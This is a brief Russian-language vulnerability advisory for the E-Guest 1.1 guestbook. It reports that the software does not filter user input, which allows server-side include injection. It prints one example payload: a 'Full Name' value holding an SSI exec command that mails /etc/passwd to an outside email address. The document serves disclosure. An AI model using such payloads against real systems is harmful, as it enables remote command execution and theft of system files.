E-Guest - бесплатная гостевая книга для UNIX и LINUX систем. E-Guest не фильтрует ввод пользователя. Уязвимость позволяет удаленному
хакеру передать команды через server-side includes,
они будут выполнены на уязвимой системе. Пример:
Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
Уязвимость обнаружена в Leung Eric E-Guest 1.1.